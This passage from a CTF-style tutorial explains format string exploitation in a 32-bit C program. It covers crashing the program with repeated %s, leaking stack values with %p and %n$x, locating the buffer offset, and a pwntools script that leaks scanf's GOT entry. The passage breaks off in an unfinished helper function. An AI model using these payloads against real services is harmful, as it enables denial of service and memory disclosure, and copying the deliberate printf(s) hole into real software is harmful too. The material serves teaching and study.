Exploitation¶
In the previous section, we demonstrated two exploitation techniques for format string vulnerabilities:
- Crashing the program, since the probability that the address corresponding to %s is invalid is relatively high.
- Viewing process contents, outputting stack contents using %d, %f.
Below we will explain each aspect in more detail.
Crashing the Program¶
Generally speaking, using a format string vulnerability to crash the program is the simplest exploitation method, because we only need to input several %s:
%s%s%s%s%s%s%s%s%s%s%s%s%s%s
This works because it is very unlikely that every value on the stack is a valid address, so sooner or later one of the %s conversions dereferences an invalid pointer and the program crashes. Although this does not give the attacker control over the program, it does make the program unusable. For example, if a remote service has a format string vulnerability, we can attack its availability by crashing the service so that users can no longer access it.
Leaking Memory¶
Format string vulnerabilities also let us read data we are interested in. The common operations are:
- Leaking stack memory
  - Getting the value of a variable
  - Getting the memory at the address stored in a variable
- Leaking memory at an arbitrary address
  - Reading GOT entries to obtain the addresses of libc functions, identifying the libc version from them, and then computing the addresses of other libc functions
  - Blind dumping: dumping the entire program to obtain useful information
Leaking Stack Memory¶
For example, given the following program:
#include <stdio.h>
int main() {
    char s[100];
    int a = 1, b = 0x22222222, c = -1;
    scanf("%s", s);
    printf("%08x.%08x.%08x.%s\n", a, b, c, s);
    printf(s);
    return 0;
}
Then, we simply compile it:
➜ leakmemory git:(master) ✗ gcc -m32 -fno-stack-protector -no-pie -o leakmemory leakmemory.c
leakmemory.c: In function 'main':
leakmemory.c:7:10: warning: format not a string literal and no format arguments [-Wformat-security]
printf(s);
^
As the warning shows, the compiler notices that the format passed to printf is not a string literal and that no format arguments are supplied. Below, let's see how to obtain the corresponding stack memory.
Under the 32-bit C calling convention, all arguments are passed on the stack, so a format function simply reads successive stack slots, starting just above the format string pointer and moving toward higher addresses, one for each conversion in the format string. (On 64-bit, the first few arguments come from registers according to that platform's parameter passing rules.) Here we mainly introduce the 32-bit case.
Getting Stack Variable Values¶
First, we can use a format string to read the values of variables on the stack. Let's try it; the output is as follows:
➜ leakmemory git:(master) ✗ ./leakmemory
%08x.%08x.%08x
00000001.22222222.ffffffff.%08x.%08x.%08x
ffcfc400.000000c2.f765a6bb
As you can see, we indeed obtained some content. For more detailed observation, we use GDB to debug and verify our idea. Here we removed some unnecessary information and only focus on the code segment and the stack.
First, start the program and set a breakpoint at the printf function:
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
Then, run the program:
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%08x.%08x.%08x
At this point, the program waits for our input. We enter %08x.%08x.%08x and press Enter to let the program continue running. We can see that the program first breaks at the first call to the printf function:
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: No such file or directory.
────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd04│+0x18: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd08│+0x1c: 0x000000c2
We can see that at this point we have entered the printf function. The first variable on the stack is the return address, the second variable is the address of the format string, the third variable is the value of a, the fourth variable is the value of b, the fifth variable is the value of c, and the sixth variable is the address corresponding to the format string we entered. Continue running the program:
gef➤ c
Continuing.
00000001.22222222.ffffffff.%08x.%08x.%08x
We can see that the program indeed outputs the value corresponding to each variable, and breaks at the next printf:
Breakpoint 1, __printf (format=0xffffcd10 "%08x.%08x.%08x") at printf.c:28
28 in printf.c
───────────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd04│+0x08: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: "%08x.%08x.%08x" ← $eax
0xffffcd14│+0x18: ".%08x.%08x"
0xffffcd18│+0x1c: "x.%08x"
At this point, since the format string is %08x.%08x.%08x, the program treats the values at 0xffffcd04, 0xffffcd08, and 0xffffcd0c as its first, second, and third format arguments, interprets each as an int, and prints it. Continuing execution, we get the following result, which is indeed as expected:
gef➤ c
Continuing.
ffffcd10.000000c2.f7e8b6bb[Inferior 1 (process 57077) exited normally]
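The walk over the stack can be mimicked in a few lines of Python. This is only a sketch: the `stack` list copies the three words shown in the dump above (0xffffcd04 through 0xffffcd0c, the slots right after the format pointer), and `fake_printf_x` is a hypothetical helper, not a libc function.

```python
# Words printf finds right after its format pointer, copied from the gdb dump
# above (addresses 0xffffcd04, 0xffffcd08, 0xffffcd0c).
stack = [0xffffcd10, 0x000000c2, 0xf7e8b6bb]

def fake_printf_x(num_specifiers, args):
    """Mimic '%08x.%08x...': consume one 4-byte word per specifier, in order."""
    return ".".join("%08x" % word for word in args[:num_specifiers])

print(fake_printf_x(3, stack))  # ffffcd10.000000c2.f7e8b6bb
```

The printed string matches what the real program produced, which shows that the leak is nothing more than the neighbouring stack words read in order.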
Of course, we can also use %p to get data, as follows:
%p.%p.%p
00000001.22222222.ffffffff.%p.%p.%p
0xfff328c0.0xc2.0xf75c46bb
Note that the results are not the same on every run. Addresses such as 0xfff328c0 and 0xf75c46bb change because ASLR places the stack and the libraries at different locations each time, and the stack slots being read are uninitialized leftovers from earlier calls.
The methods above all read the arguments on the stack one after another. Is there a way to directly get the value that is treated as the (n+1)th parameter? Of course there is. The method is as follows:
%n$x
With this string we get the value of the (n+1)th parameter. Why (n+1)? Because n counts the arguments consumed by the format string, and the format string itself is the first parameter of the output function, so the nth format argument is the function's (n+1)th parameter.
Here we debug again with gdb.
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%3$x
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: No such file or directory.
─────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
─────────────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → "%3$x"
0xffffcd04│+0x18: 0xffffcd10 → "%3$x"
0xffffcd08│+0x1c: 0x000000c2
gef➤ c
Continuing.
00000001.22222222.ffffffff.%3$x
Breakpoint 1, __printf (format=0xffffcd10 "%3$x") at printf.c:28
28 in printf.c
─────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
─────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → "%3$x"
0xffffcd04│+0x08: 0xffffcd10 → "%3$x"
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: "%3$x" ← $eax
0xffffcd14│+0x18: 0xffffce00 → 0x00000001
0xffffcd18│+0x1c: 0x000000e0
gef➤ c
Continuing.
f7e8b6bb[Inferior 1 (process 57442) exited normally]
We can see that we indeed obtained the value f7e8b6bb corresponding to the 4th parameter of printf.
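The slot that a positional specifier reads can be computed directly from the stack pointer. The sketch below assumes the 32-bit layout seen in the dumps (return address at esp, format pointer at esp+4); `positional_arg_address` is a hypothetical helper name.

```python
WORD = 4  # 32-bit cdecl: every variadic slot is one 4-byte word

def positional_arg_address(esp_at_entry, n, word=WORD):
    """Address of the slot read by the n-th format argument (e.g. %3$x).

    esp+0 holds the return address and esp+4 the format pointer, so the
    n-th format argument lives n words above the format pointer.
    """
    return esp_at_entry + word + n * word

# esp was 0xffffccfc when the second printf was entered
print(hex(positional_arg_address(0xffffccfc, 3)))  # 0xffffcd0c
```

In the dump, 0xffffcd0c is exactly the slot that holds 0xf7e8b6bb, the value printed by %3$x.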
Getting the String Corresponding to a Stack Variable¶
Furthermore, we can also get the string corresponding to a stack variable, which actually requires the use of %s. Here we still use the program above and debug with gdb, as follows:
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%s
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: No such file or directory.
────────────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x18: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x1c: 0x000000c2
gef➤ c
Continuing.
00000001.22222222.ffffffff.%s
Breakpoint 1, __printf (format=0xffffcd10 "%s") at printf.c:28
28 in printf.c
──────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x08: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: 0xff007325 ("%s"?) ← $eax
0xffffcd14│+0x18: 0xffffce3c → 0xffffd074 → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd18│+0x1c: 0x000000e0
gef➤ c
Continuing.
%s[Inferior 1 (process 57488) exited normally]
We can see that during the second call to printf, the value stored at 0xffffcd04 was indeed treated as a string pointer. That value is 0xffffcd10, the address of our own input, so the string printed is %s itself.
Of course, this does not always work. If the value in question is not a valid string address, the program crashes.
We can also choose which parameter on the stack is printed as a string. For example, if we select the 3rd parameter of printf (here 0x000000c2) as shown below, it cannot be dereferenced and the program crashes:
➜ leakmemory git:(master) ✗ ./leakmemory
%2$s
00000001.22222222.ffffffff.%2$s
[1] 57534 segmentation fault (core dumped) ./leakmemory
Tips Summary
- Use %x to get the corresponding stack memory, but it is recommended to use %p, which eliminates the need to consider differences in word size.
- Use %s to get the content at the address stored in a variable; note that the output stops at the first null byte.
- Use %order$x to get the value of a specified parameter, and use %order$s to get the content at the address corresponding to a specified parameter.
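These tips combine naturally into a small probe generator. The following is a minimal sketch; `build_probe` is a hypothetical helper, and the "." separator is an arbitrary choice (it must not be whitespace, because scanf("%s") in the example program would stop reading there).

```python
def build_probe(first, last, conv="p", sep="."):
    """Build a format string that prints format arguments first..last."""
    return sep.join("%{}${}".format(i, conv) for i in range(first, last + 1))

print(build_probe(1, 3))        # %1$p.%2$p.%3$p
print(build_probe(4, 4, "s"))   # %4$s
```

Since the buffer in the example program is only 100 bytes, a probe should cover a modest range of indices at a time.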
Leaking Arbitrary Address Memory¶
As we can see from above, whether leaking consecutive variables on the stack or leaking specified variable values, we never fully controlled the address of the variable we wanted to leak. Such leaks are certainly useful, but not powerful enough. Sometimes, we may want to leak the GOT table content of a certain libc function to obtain its address, then get the libc version and other function addresses. In such cases, being able to fully control the leak of memory at a specified address becomes very important. So can we actually do this? Of course we can.
Let's think carefully again. Generally speaking, in format string vulnerabilities, the format string we read is on the stack (because it is a local variable of some function; in this example, s is a local variable of the main function). This means that when calling the output function, the value of the first parameter is actually the address of that format string. Let's use one of the function calls above as an example:
Breakpoint 1, __printf (format=0xffffcd10 "%s") at printf.c:28
28 in printf.c
──────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x08: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: 0xff007325 ("%s"?) ← $eax
0xffffcd14│+0x18: 0xffffce3c → 0xffffd074 → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd18│+0x1c: 0x000000e0
We can see that the second variable on the stack is our format string address 0xffffcd10, and the content stored at that address is indeed the "%s" format string.
Since we control the format string, suppose we know its position among the arguments when the output function is called: let the start of the format string be the kth argument of the format string, that is, the (k+1)th parameter of the function call. Then we can read the content at a chosen address addr in the following way:
addr%k$s
Note: Here, if the format string is on the stack, then we can definitely determine the relative offset of the format string, because at the time of the function call, the stack pointer is at least 8 bytes or 16 bytes below the format string address.
The next question is how to determine which parameter the format string is. We can determine this using the following method:
[tag]%p%p%p%p%p%p...
Generally, we use one character repeated to fill a machine word as the tag (for example AAAA on 32-bit), followed by several %p to print the stack contents. If one of the printed values matches the tag, we can be fairly confident that this slot is where the format string starts. We say "fairly confident" because we cannot rule out that some temporary on the stack happens to hold the same value. This is extremely rare in practice, and we can always repeat the test with a different character to confirm. Here we use the character 'A' and the previously compiled program, as follows:
➜ leakmemory git:(master) ✗ ./leakmemory
AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
00000001.22222222.ffffffff.AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
AAAA0xffaab1600xc20xf76146bb0x414141410x702570250x702570250x702570250x702570250x702570250x702570250x702570250x70250xffaab2240xf77360000xaec7%
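The position of the tag in output like this can be found mechanically instead of by counting. The sketch below assumes glibc-style %p output ("0x..." for non-null values and "(nil)" for null pointers); `find_tag_index` is a hypothetical helper, and the sample string is the program output shown above.

```python
def find_tag_index(leak, tag=0x41414141):
    """Return the 1-based format-argument index whose printed value equals tag."""
    # glibc prints null pointers as "(nil)"; normalise them so every value
    # starts with "0x" and the string can be split on that prefix.
    normalised = leak.replace("(nil)", "0x0")
    values = [int(part, 16) for part in normalised.split("0x")[1:]]
    return values.index(tag) + 1

leak = ("AAAA0xffaab1600xc20xf76146bb0x414141410x702570250x70257025"
        "0x702570250x702570250x702570250x702570250x702570250x7025"
        "0xffaab2240xf77360000xaec7")
print(find_tag_index(leak))  # 4
```

Splitting on "0x" is safe here because the character x never appears inside a hexadecimal value. In practice, putting a separator such as "." between the %p conversions makes the output easier to read as well.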
From the position of 0x41414141, we can see that the starting address of our format string is exactly the 5th parameter of the output function, but the 4th parameter of the format string. Let's test this:
➜ leakmemory git:(master) ✗ ./leakmemory
%4$s
00000001.22222222.ffffffff.%4$s
[1] 61439 segmentation fault (core dumped) ./leakmemory
As we can see, our program crashed. Why? Because %4$s takes the first four bytes of the format string itself and uses them as an address, and that value is obviously not a valid address, so the program crashed. The details can be seen in the debugging session below:
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
───────────────────────────────────────────────────────────────────[ stack ]────
['0xffffcd0c', 'l8']
8
0xffffcd0c│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd10│+0x04: 0xffffcd20 → "%4$s"
0xffffcd14│+0x08: 0xffffcd20 → "%4$s"
0xffffcd18│+0x0c: 0x000000c2
0xffffcd1c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd20│+0x14: "%4$s" ← $eax
0xffffcd24│+0x18: 0xffffce00 → 0x00000000
0xffffcd28│+0x1c: 0x000000e0
───────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0xf7e44670 → Name: __printf(format=0xffffcd20 "%4$s")
[#1] 0x80484ce → Name: main()
────────────────────────────────────────────────────────────────────────────────
gef➤ help x/
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
t(binary), f(float), a(address), i(instruction), c(char), s(string)
and z(hex, zero padded on the left).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.
Defaults for format and size letters are those previously used.
Default count is 1. Default address is following last thing printed
with this command or "print".
gef➤ x/x 0xffffcd20
0xffffcd20: 0x73243425
gef➤ vmmap
Start End Offset Perm Path
0x08048000 0x08049000 0x00000000 r-x /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x08049000 0x0804a000 0x00000000 r-- /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x0804a000 0x0804b000 0x00001000 rw- /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x0804b000 0x0806c000 0x00000000 rw- [heap]
0xf7dfb000 0xf7fab000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fab000 0xf7fad000 0x001af000 r-- /lib/i386-linux-gnu/libc-2.23.so
0xf7fad000 0xf7fae000 0x001b1000 rw- /lib/i386-linux-gnu/libc-2.23.so
0xf7fae000 0xf7fb1000 0x00000000 rw-
0xf7fd3000 0xf7fd5000 0x00000000 rw-
0xf7fd5000 0xf7fd7000 0x00000000 r-- [vvar]
0xf7fd7000 0xf7fd9000 0x00000000 r-x [vdso]
0xf7fd9000 0xf7ffb000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffb000 0xf7ffc000 0x00000000 rw-
0xf7ffc000 0xf7ffd000 0x00022000 r-- /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000 0x00023000 rw- /lib/i386-linux-gnu/ld-2.23.so
0xffedd000 0xffffe000 0x00000000 rw- [stack]
gef➤ x/x 0x73243425
0x73243425: Cannot access memory at address 0x73243425
Obviously, the value 0x73243425 corresponding to the format string at 0xffffcd20 cannot be accessed by the program, so the program naturally crashed.
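The same check can be reproduced offline. In this sketch the `MAPPED` list merges adjacent regions from the vmmap listing above, and `as_pointer` and `is_mapped` are hypothetical helper names.

```python
import struct

# (start, end) ranges merged from the vmmap listing above
MAPPED = [
    (0x08048000, 0x0804b000),  # the leakmemory binary
    (0x0804b000, 0x0806c000),  # heap
    (0xf7dfb000, 0xf7fb1000),  # libc and the adjacent rw pages
    (0xf7fd3000, 0xf7ffe000),  # rw pages, vvar, vdso, ld.so
    (0xffedd000, 0xffffe000),  # stack
]

def as_pointer(first_four_bytes):
    """Interpret four bytes the way a 32-bit little-endian CPU reads a pointer."""
    return struct.unpack("<I", first_four_bytes)[0]

def is_mapped(addr):
    return any(start <= addr < end for start, end in MAPPED)

ptr = as_pointer(b"%4$s")
print(hex(ptr), is_mapped(ptr))  # 0x73243425 False
```

The characters %, 4, $, s are the bytes 0x25, 0x34, 0x24, 0x73, which read as the little-endian word 0x73243425, an address outside every mapped region.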
So what if we put an accessible address there, for example scanf@got? The output should then be the address of scanf. Let's try it.
Note: we use scanf@got rather than printf@got because the address of printf@got, 0x0804a00c, contains the byte 0x0c. scanf("%s") stops reading at whitespace bytes such as 0x0a, 0x0b, and 0x0c, and a 0x00 byte ends the string as far as printf is concerned, so addresses containing these bytes cannot be delivered intact. Feel free to try it if you're interested.
First, get the address of scanf@got, as follows:
gef➤ got
/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049ffc R_386_GLOB_DAT __gmon_start__
0804a00c R_386_JUMP_SLOT printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.0
0804a014 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7
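Before choosing a GOT entry it is worth checking whether its address survives the input path. The sketch below assumes the input is read with scanf("%s") (which stops at C-locale whitespace) and later consumed by printf (which stops at a null byte); `bad_bytes` is a hypothetical helper.

```python
import struct

SCANF_STOP = b"\x09\x0a\x0b\x0c\x0d\x20"  # whitespace that ends a %s conversion
PRINTF_STOP = b"\x00"                      # terminates the format string

def bad_bytes(addr):
    """Return the bytes of a packed 32-bit address that would break delivery."""
    packed = struct.pack("<I", addr)
    return [b for b in packed if b in SCANF_STOP + PRINTF_STOP]

print(bad_bytes(0x0804a00c))  # printf@got: [12], i.e. the 0x0c byte
print(bad_bytes(0x0804a014))  # __isoc99_scanf@got: []
```

This is why the example below targets the __isoc99_scanf entry rather than the printf entry.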
Below we use pwntools to construct the payload as follows:
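from pwn import *

sh = process('./leakmemory')
leakmemory = ELF('./leakmemory')
# Address of the GOT slot that holds the resolved address of __isoc99_scanf
__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']
print(hex(__isoc99_scanf_got))
# The packed address becomes the 4th format argument, which %4$s dereferences
payload = p32(__isoc99_scanf_got) + b'%4$s'
print(payload)
gdb.attach(sh)
sh.sendline(payload)
sh.recvuntil(b'%4$s\n')
# Skip the 4 echoed address bytes; the next 4 bytes are the leaked pointer
print(hex(u32(sh.recv()[4:8])))
sh.interactive()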
Here, we use gdb.attach(sh) for debugging. When execution reaches the second printf call (remember to set a breakpoint), we can see that the fourth format argument is indeed 0x0804a014, the address of scanf@got, which in turn holds the address of scanf. The output is:
→ 0xf7615670 <printf+0> call 0xf76ebb09 <__x86.get_pc_thunk.ax>
↳ 0xf76ebb09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf76ebb0c <__x86.get_pc_thunk.ax+3> ret
0xf76ebb0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf76ebb10 <__x86.get_pc_thunk.dx+3> ret
───────────────────────────────────────────────────────────────────[ stack ]────
['0xffbbf8dc', 'l8']
8
0xffbbf8dc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffbbf8e0│+0x04: 0xffbbf8f0 → 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp
0xffbbf8e4│+0x08: 0xffbbf8f0 → 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp
0xffbbf8e8│+0x0c: 0x000000c2
0xffbbf8ec│+0x10: 0xf765c6bb → <handle_intel+107> add esp, 0x10
0xffbbf8f0│+0x14: 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp ← $eax
0xffbbf8f4│+0x18: "%4$s"
0xffbbf8f8│+0x1c: 0x00000000
At the same time, in our running terminal:
➜ leakmemory git:(master) ✗ python exploit.py
[+] Starting local process './leakmemory': pid 65363
[*] '/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
0x804a014
\x14\xa0\x0%4$s
[*] running in new terminal: /usr/bin/gdb -q "/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory" 65363
[+] Waiting for debugger: Done
0xf76280c0
[*] Switching to interactive mode
[*] Process './leakmemory' stopped with exit code 0 (pid 65363)
[*] Got EOF while reading in interactiv
We indeed obtained the address of scanf.
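To make the byte layout explicit, the payload and the parsing step can be reproduced with the standard library alone. This is a sketch, not the script used above: `build_payload` and `parse_leak` are hypothetical helpers, and `fake_reply` is a hand-built stand-in for what the process sent back in the run shown above.

```python
import struct

SCANF_GOT = 0x0804a014  # __isoc99_scanf slot from the relocation listing

def build_payload(addr, index):
    """Packed address first, then the %<index>$s that dereferences it."""
    return struct.pack("<I", addr) + b"%" + str(index).encode() + b"$s"

def parse_leak(reply):
    """reply[0:4] is the echoed address; the next 4 bytes are the pointer.

    %s stops at a null byte, so fewer than 4 bytes may arrive; pad with zeros.
    """
    return struct.unpack("<I", reply[4:8].ljust(4, b"\x00"))[0]

payload = build_payload(SCANF_GOT, 4)
fake_reply = struct.pack("<I", SCANF_GOT) + struct.pack("<I", 0xf76280c0)
print(payload, hex(parse_leak(fake_reply)))
```

The padding in `parse_leak` is a defensive assumption for pointers that contain a zero byte; in the run above all four bytes were present.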
However, the address does not always land on a boundary that is an integer multiple of the machine word length from the start of the arguments, in which case no single parameter index selects it. We then need to pad the format string so that the address we want to dereference starts at such a boundary. Generally, it looks something like this:
[padding][addr]
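One way to build such a payload is to put the directive first, pad it to a word boundary, and append the address. The sketch below is an assumption-laden illustration: `leak_payload` is a hypothetical helper, `base_index` is the format-argument index of the first word of the buffer (4 for leakmemory), and the filler byte A is arbitrary.

```python
import struct

def leak_payload(addr, base_index, word=4):
    """Return directive + padding + packed address, with a consistent index."""
    pack_fmt = "<I" if word == 4 else "<Q"
    index = base_index
    while True:
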